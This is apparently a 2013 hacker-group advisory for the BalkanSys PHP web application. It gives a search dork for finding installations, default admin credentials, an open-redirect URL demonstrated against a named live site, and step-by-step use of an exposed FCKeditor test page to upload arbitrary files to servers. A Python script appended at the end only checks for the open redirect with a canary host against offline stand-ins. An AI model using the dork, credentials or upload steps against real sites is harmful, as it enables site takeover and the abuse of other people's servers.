#Title : BalkanSys Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 10/26/2013
#Category : Web Applications
#Type : PHP
#Vendor : http://balkansys.com/
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security | Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded
#Vulnerability : Default Password, Open Redirection, Arbitrary File Upload
#Dork : inurl:/?act=show_page

Admin Login with Default Credentials

The admin panel accepts the vendor's default account if it has not been changed:

http://site-target/admin/
Username : admin
Password : admin

============================================================================================

Open Redirection

The act=redirect handler sends the browser to whatever is supplied in the url parameter without checking that the target belongs to the site:

http://site-target/index.php?act=redirect&bid=1&url=[URL Redirect]

Example :
http://orpheusclub.com/index.php?act=redirect&bid=1&url=http://newbie-security.or.id/

============================================================================================

Arbitrary File Upload (FCKEditor)
Special Thanks ReC0ded

The FCKeditor file manager ships with a connector test page, and it is left reachable under the admin directory:

http://site-target/admin/FCKeditor/editor/filemanager/connectors/uploadtest.html

1. Change the connector type from ASP to PHP
2. Select your file and click "Send it to the Server"
3. The uploaded file is available at http://site-target/site_files/UserFiles/[YOUR_FILE].txt
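The following is an added example for the Open Redirection section above; it is not part of the advisory or of BalkanSys itself. It confirms the act=redirect issue the way a tester should: send a canary host in url=, stop at the 3xx instead of following it, and decide from the Location header alone. The `vulnerable_site` and `patched_site` functions are constructed stand-ins for the target so the check runs offline, and `site-target` is the advisory's placeholder hostname; `http_fetch_headers` is the live fetcher you would pass in against a real host.

```python
"""Confirm the act=redirect open redirect with a canary host, without following the 3xx."""
import secrets
import urllib.error
import urllib.parse
import urllib.request

# Endpoint and parameter names as given in the advisory.
REDIRECT_PATH = "/index.php?act=redirect&bid=1&url="
REDIRECT_CODES = {301, 302, 303, 307, 308}


def probe_url(base, canary_host):
    """Build the probe: url= points at a canary host nobody but us would return."""
    target = f"http://{canary_host}/"
    return base.rstrip("/") + REDIRECT_PATH + urllib.parse.quote(target, safe="")


def location_host(location):
    """Host a browser would land on for a Location header value; None when the
    redirect stays on the current origin (relative URL or non-http scheme)."""
    if not location:
        return None
    loc = location.strip().replace("\\", "/")  # browsers treat '\' as '/'
    if loc.startswith("//"):                    # scheme-relative still leaves the site
        loc = "http:" + loc
    parts = urllib.parse.urlsplit(loc)
    if parts.scheme.lower() not in ("http", "https") or not parts.hostname:
        return None
    return parts.hostname.lower()


def confirm_open_redirect(base, fetch_headers, canary_host=None):
    """True only if the app answered a 3xx whose Location lands on our canary host."""
    canary_host = canary_host or f"{secrets.token_hex(6)}.invalid"
    status, headers = fetch_headers(probe_url(base, canary_host))
    headers = {k.lower(): v for k, v in headers.items()}
    return status in REDIRECT_CODES and location_host(headers.get("location")) == canary_host


class _NoFollow(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # urlopen then raises HTTPError carrying the 3xx and its headers


def http_fetch_headers(url, timeout=10):
    """Live fetcher: returns (status, headers) and never follows the redirect."""
    opener = urllib.request.build_opener(_NoFollow)
    try:
        with opener.open(url, timeout=timeout) as resp:
            return resp.status, dict(resp.headers)
    except urllib.error.HTTPError as err:
        return err.code, dict(err.headers)


# Constructed stand-ins for the target so the check can be exercised offline.
def _url_param(probe):
    qs = urllib.parse.parse_qs(urllib.parse.urlsplit(probe).query)
    return qs.get("url", [""])[0]


def vulnerable_site(probe):
    """Behaves as the advisory describes: reflects url= into Location unchecked."""
    return 302, {"Location": _url_param(probe)}


def patched_site(probe):
    """Hypothetical fix: only redirect when the target stays on the site's own host."""
    target = _url_param(probe)
    own_host = urllib.parse.urlsplit(probe).hostname
    if location_host(target) in (None, own_host):
        return 302, {"Location": target}
    return 400, {"Content-Type": "text/plain"}


if __name__ == "__main__":
    print(confirm_open_redirect("http://site-target", vulnerable_site))  # True
    print(confirm_open_redirect("http://site-target", patched_site))     # False
```

Against a live host call `confirm_open_redirect("http://host", http_fetch_headers)`. Using a random `.invalid` canary rather than a real domain avoids a false positive from a site that happens to allow some fixed third-party host, and `location_host` treats `//evil`, `/\evil` and `http://user@evil` the way a browser does, so a filter that only blocks values starting with `http://` is still reported as open.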